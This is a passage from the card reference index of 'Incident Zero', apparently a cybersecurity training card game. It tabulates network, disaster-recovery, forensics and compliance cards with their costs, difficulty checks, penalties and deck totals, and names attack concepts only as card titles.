SEC-09 SIEM (Security Information & Event Management) 15 Multiple (detection) / Central
SEC-10 Honeypot Network 8 NETWORK (detection) / Isolated

Architecture Cards (ARCH-01 – ARCH-05)

Card ID Title Cost Complexity
ARCH-01 Flat Network (Traditional) 0 1/5
ARCH-02 Segmented 3-Zone (DMZ Model) 5 2/5
ARCH-03 Fully Isolated (Zero Trust Model) 12 4/5
ARCH-04 Cloud Hybrid (Mixed On-Premises & Cloud) 8 3/5
ARCH-05 Cloud First (Cloud-Only Infrastructure) 6 2/5

Asset Cards (ASSET-01 – ASSET-08)

Card ID Title Criticality Fulfilled By
ASSET-01 Email High SRV-01
ASSET-02 Web Medium SRV-02
ASSET-03 Database Very High SRV-03
ASSET-04 File Storage High SRV-04
ASSET-05 Identity Very High SRV-05
ASSET-06 Development Medium SRV-06
ASSET-07 Disaster Recovery Very High SRV-07
ASSET-08 VPN/Remote Access Medium SEC-05

Legacy System Cards (LEGACY-01 – LEGACY-04, Expansion)

Card ID Title Cost Key Challenge
LEGACY-01 Mainframe System 15 Cannot patch, mission-critical
LEGACY-02 Custom Business Application 8 Vendor no longer exists
LEGACY-03 Industrial Control System (ICS) 12 Real-time + safety-critical
LEGACY-04 Obsolete Operating System 5 All vulnerabilities public

Cloud Variant Cards (CLOUD-01 – CLOUD-04, Expansion)

Card ID Title Cost Primary Benefit
CLOUD-01 Containerized Microservices 6 Scalability & Velocity
CLOUD-02 Serverless/Function-as-a-Service 3 Simplicity & Cost
CLOUD-03 Database-as-a-Service (Managed Database) 5 Reliability & Compliance
CLOUD-04 Content Delivery Network (CDN) 4 Performance & DDoS Protection

Business Requirement Cards (REQ-01 – REQ-20, Standalone)

Card ID Title Satisfied By Missed Penalty
REQ-01 New Product Launch Website Web Server or cloud web -5
REQ-02 Customer Data Acquisition Database (dedicated or cloud) -10
REQ-03 Work-From-Home Program VPN Gateway -3
REQ-04 Remote Workforce Mandate VPN Gateway + Domain Controller -5
REQ-05 HIPAA Compliance Mandate Backup + segmentation -10
REQ-06 PCI Scope: Cardholder Data Database + Firewall/Segmentation -10
REQ-07 99.9% Uptime SLA Load Balancer or duplicate server -5
REQ-08 M&A: Integrate Acquired Network 2 spare slots or new server -10
REQ-09 Scale Email System 2nd Email Server / LB / cloud email -5
REQ-10 Security Audit Ordered SIEM, or IDS + Email Gateway -5
REQ-11 Board Demands IR Readiness IDS, IPS, or SIEM -10
REQ-12 Ransomware Wave in Sector Backup + detection -20
REQ-13 New Subsidiary Office VPN Gateway -5
REQ-14 E-Commerce Expansion Web + WAF -5
REQ-15 Developer Hiring Spree Dev Server or overload -3
REQ-16 Records-Retention Regulation File storage + Backup -5
REQ-17 Single Sign-On Rollout Domain Controller -5
REQ-18 Cyber-Insurance Renewal Backup + Email Gateway + detection -5 (met: +5)
REQ-19 Threat-Intel Pilot Honeypot 0 (met: +5)
REQ-20 Data-Center Consolidation Any cloud-hosted service -3 (met: +3)

Operational Event Cards (EVT-01 – EVT-16, Standalone)

Card ID Title Effect (Unmitigated) Mitigated By
EVT-01 Email Server Failure Pay 5 or -10 pts Redundant/cloud email
EVT-02 Traffic Spike -5 pts (or +5 if ready) LB / CDN / redundant web
EVT-03 Phishing Wave -10 pts (or +5 if ready) Email Gateway
EVT-04 Cloud Vendor Outage -5 pts if cloud-only service On-prem redundancy
EVT-05 Budget Cut -5 Budget Contingency reserve
EVT-06 Emergency Funds +10 Budget
EVT-07 Security Grant +5 Budget if Backup
EVT-08 File Server Filling Up Buy capacity or -5 pts Spare capacity
EVT-09 Honeypot Triggers +5 pts if honeypot
EVT-10 Insider Snooping -5 pts (or +5 if ready) SIEM / segmentation
EVT-11 Ransomware Strikes -20 pts Backup (+ detection: +5)
EVT-12 IT Staff Burnout Max 1 deploy this turn Completed builds
EVT-13 Vendor Promotion Next device -2 cost
EVT-14 New Hire Needs Remote Access -3 pts VPN Gateway
EVT-15 Hardware Recall Pay 3 or server offline Redundancy / cloud
EVT-16 Quiet Quarter Nothing

Disaster Recovery Module

Module total: 38 cards (30 core + 8 expansion scenarios).

Deck File Card IDs Count Description
Crisis Actions crisis-action-cards.md ACTION-01 – ACTION-13 13 Investigation, Remediation, Communication actions plus the Ransom Decision
Event Timeline event-cards.md EVENT-01 – EVENT-12 12 6 Scheduled + 6 Triggered crisis events on the 8-turn Crisis Clock
Stakeholders stakeholder-cards.md STAKE-01 – STAKE-05 5 Trust meters for the five stakeholder groups
Advanced Scenarios (exp.) advanced-scenarios.md SCENARIO-01 – SCENARIO-08 8 High/extreme-difficulty crisis setups

Crisis Action Cards (ACTION-01 – ACTION-13)

Card ID Title Category Cost Advance Duration
ACTION-01 Forensic Analysis Investigation 12 +25% 2 turns
ACTION-02 Threat Hunting Investigation 8 +15% 1 turn
ACTION-03 Log Analysis Investigation 5 +10% 1 turn
ACTION-04 Third-Party Incident Response Engagement Investigation 20 +30% Inv / +20% Rem 3 turns
ACTION-05 Patch & Harden (Affected Systems) Remediation 10 +20% 1 turn
ACTION-06 Containment (Isolate Compromised Systems) Remediation 8 +15% 1 turn
ACTION-07 System Rebuild/Recovery from Backup Remediation 15 +25% 2 turns
ACTION-08 Change Credentials & Access Controls Remediation 6 +12% 1 turn
ACTION-09 Customer Notification Communication 10 +20% 1 turn
ACTION-10 Regulatory/Law Enforcement Notification Communication 8 +10% 1 turn
ACTION-11 Media/Public Relations Management Communication 12 +15% 1 turn
ACTION-12 Board & Shareholder Communication Communication 9 +12% 1 turn
ACTION-13 Ransom Decision (v2.2) Crisis Decision 0/5/20 Pay: +20% Rem Instant (once per game)

Standing rule (not a card): the free Holding Statement — Communication, 0 Budget, +5%.

Event Timeline Cards (EVENT-01 – EVENT-12)

Card ID Title Kind Turn / Trigger
EVENT-01 First Media Coverage Scheduled Turn 2
EVENT-02 Regulatory 72-Hour Deadline Scheduled Turn 6 (deadline Turn 8)
EVENT-03 Customer Notification Window Scheduled Turn 5
EVENT-04 Board Meeting Scheduled Turn 3
EVENT-05 Customer Class Action Lawsuit Triggered Customers un-notified after T5 or trust <20%
EVENT-06 Regulatory Fine Triggered Regulator trust <20%
EVENT-07 Media Frenzy Triggered Media <20% or silent through T3
EVENT-08 Second Breach Discovered Triggered T6: Remediation <30%, no rebuild
EVENT-09 Shareholder Pressure Scheduled Turn 5 (public co.)
EVENT-10 Competitor Advantage Triggered Customer trust <40% from T5
EVENT-11 Key Executive Resignation Triggered Executive trust <30%
EVENT-12 Government Subpoena Scheduled Turn 7 (med/large org)

Stakeholder Cards (STAKE-01 – STAKE-05)

Card ID Title Type Starting Trust
STAKE-01 Customers External 50%
STAKE-02 Regulators Government 60%
STAKE-03 Media / Public External 40%
STAKE-04 Board of Directors Internal 70%
STAKE-05 Executive Leadership Internal 80%

Advanced Scenario Cards (SCENARIO-01 – SCENARIO-08, Expansion)

Card ID Title Difficulty Key Pressure
SCENARIO-01 Multi-Region Breach with Data Sovereignty Issues HIGH 3 different regulatory timelines
SCENARIO-02 Ransomware with Extortion Threat HIGH $10M decision + data publication threat
SCENARIO-03 Supply Chain Compromise (Vendor Breach Affects Customers) HIGH Vendor failure, customer trust
SCENARIO-04 Insider Threat Revealed Mid-Crisis HIGH Organizational trust collapse
SCENARIO-05 Critical Infrastructure Breach (Safety/Lives at Risk) EXTREME Lives at risk, government control
SCENARIO-06 Stock Price Crash (Public Company Panic) HIGH Financial crisis + board pressure
SCENARIO-07 Ransomware + Data Breach + Business Email Compromise EXTREME 3 simultaneous attacks, multiple ransoms
SCENARIO-08 Breach During Merger/Acquisition EXTREME Deal value + regulatory blocks

Forensics Module

Module total: 28 core cards (12 Investigation + 12 Evidence + 4 Findings). Expansion deck: PLANNED — not yet available (no card file exists yet; see the module README's design notes).

Deck File Card IDs Count Description
Investigation Actions investigation-cards.md DISK-01/02, MEM-01/02, LOG-01/02, NET-01/02, MALW-01/02, TIMELINE-01, THREAT-01 12 Forensic techniques rolled d20 vs DC, with Budget cost and Duration
Evidence & Findings evidence-cards.md EVD-01 – EVD-12, FIND-01 – FIND-04 16 Discovered evidence artifacts and synthesis/conclusion cards

Investigation Action Cards (12)

Card ID Title DC Cost Duration
DISK-01 Disk Image & Analysis 12 10 2 turns (rush: +5 Budget for 1)
DISK-02 File System Carving 14 15 3 turns
MEM-01 Memory Dump & Analysis 13 15 2 turns
MEM-02 Memory Forensics Deep Dive 15 20 3 turns
LOG-01 Event Log Analysis 11 5 1 turn
LOG-02 Deep Log Correlation 13 10 2 turns
NET-01 Network Traffic Analysis 12 10 2 turns
NET-02 Packet Capture Deep Analysis 14 15 3 turns
MALW-01 Malware Analysis (Dynamic) 12 15 2 turns
MALW-02 Malware Analysis (Static) 14 10 2 turns
TIMELINE-01 Timeline Reconstruction 13 5 1 turn
THREAT-01 Threat Attribution Analysis 15 20 3 turns

Evidence Cards (EVD-01 – EVD-12)

Card ID Title Type
EVD-01 Credential Dumper Malware Malware & Persistence
EVD-02 Command-and-Control Callback Domain Attack Infrastructure
EVD-03 Persistence Mechanism (Scheduled Task) Malware & Persistence
EVD-04 Suspicious Admin Login (Timeline) Credentials & Access
EVD-05 Lateral Movement Evidence (Pass-the-Hash) Lateral Movement
EVD-06 Data Exfiltration Evidence Exfiltration
EVD-07 Attacker Infrastructure Map Attack Infrastructure
EVD-08 Encryption Keys Recovered Malware & Persistence
EVD-09 Attacker Command History Attack Activity
EVD-10 Malware Behavior Profile Malware & Persistence
EVD-11 File Staging Artifacts Attack Activity
EVD-12 Anti-Forensics Evidence Attack Activity

Findings Cards (FIND-01 – FIND-04)

Card ID Title Triggered When
FIND-01 Threat Attribution Report Attribution Confidence ≥ 70%
FIND-02 Attack Surface Analysis Attack Chain ≥ 75%
FIND-03 Persistence Mechanisms Discovered Multiple persistence artifacts found
FIND-04 Investigative Gaps & Recommendations Investigation completes (Victory or Failure)

Audit & Compliance Module

Module total: 25 cards (6 core + 19 expansion). The expansion — 11 framework cards and 8 remediation cards — lives entirely in one file.

Deck File Card IDs Count Description
Audit Domains audit-domain-cards.md DOMAIN-01 – DOMAIN-06 6 Domain assessments scored 1-5 stars with PASS/FAIL mapping
Frameworks & Remediation (exp.) compliance-frameworks.md FRAMEWORK-NIST-01–05, FRAMEWORK-CIS-01–03, FRAMEWORK-PCI-01–03, REMEDIATION-01–08 19 Framework assessment variants (5 NIST + 3 CIS + 3 PCI) plus 8 remediation actions

Audit Domain Cards (DOMAIN-01 – DOMAIN-06)

Card ID Title Focus
DOMAIN-01 Network Segmentation & Isolation Network zones, lateral movement prevention
DOMAIN-02 Access Control & Identity Management MFA, credential policy
DOMAIN-03 Threat Detection & Incident Response SIEM, breach detection
DOMAIN-04 Backup & Disaster Recovery Backups, ransomware resilience
DOMAIN-05 Third-Party Risk & Cloud Security Vendor and supply chain risk
DOMAIN-06 Security Operations & Monitoring Security team, sustained posture

Compliance Framework Cards (11, Expansion)

Card ID Title Focus
FRAMEWORK-NIST-01 Identify Function Asset inventory and risk assessment
FRAMEWORK-NIST-02 Protect Function Preventive security controls
FRAMEWORK-NIST-03 Detect Function Detecting attacks as they happen
FRAMEWORK-NIST-04 Respond Function Responding to breaches/attacks
FRAMEWORK-NIST-05 Recover Function Recovery and improvement
FRAMEWORK-CIS-01 Safeguards 1-6 (Foundations) Basic security practices
FRAMEWORK-CIS-02 Safeguards 7-13 (Advanced Defenses) IR, supply chain, defense tools
FRAMEWORK-CIS-03 Safeguards 14-18 (Operations & Governance) Operational controls
FRAMEWORK-PCI-01 Infrastructure Security (Requirements 1-4) Network/system security for cardholder data
FRAMEWORK-PCI-02 Access & Operations (Requirements 5-10) Access control and operations
FRAMEWORK-PCI-03 Testing & Compliance (Requirements 11-12) Testing, monitoring, compliance management

Remediation Action Cards (REMEDIATION-01 – REMEDIATION-08, Expansion)

Card ID Title Cost
REMEDIATION-01 Implement MFA 5
REMEDIATION-02 Deploy SIEM 15
REMEDIATION-03 Implement Network Segmentation 12
REMEDIATION-04 Backup & Disaster Recovery 10
REMEDIATION-05 Security Training Program 3
REMEDIATION-06 Vendor Security Assessment 5
REMEDIATION-07 Vulnerability Management Program 8
REMEDIATION-08 Incident Response Plan & Team 12

Card Count Summary

Module Core Expansion Standalone Total
Incident Response 12 threats + 24 defenses* 8 threats + 19 defenses 63
Hardening 8 tactics (+ shared 24 defenses*) 8 tactics 16 (+24 shared)
Network Building 33 8 36 77
Disaster Recovery 30 8 38
Forensics 28 planned 28
Audit & Compliance 6 19 25

* The 24 defense cards (D-01 – D-24) are one shared deck counted once (under Incident Response) in the 247-card grand total.


License & Attribution

All cards are licensed under CC BY-NC-SA 4.0 (Creative Commons Attribution-NonCommercial-ShareAlike).


Incident Zero: Card Reference Index Version 2.2 - Playtest Edition Generated from the card files — the card files are canonical.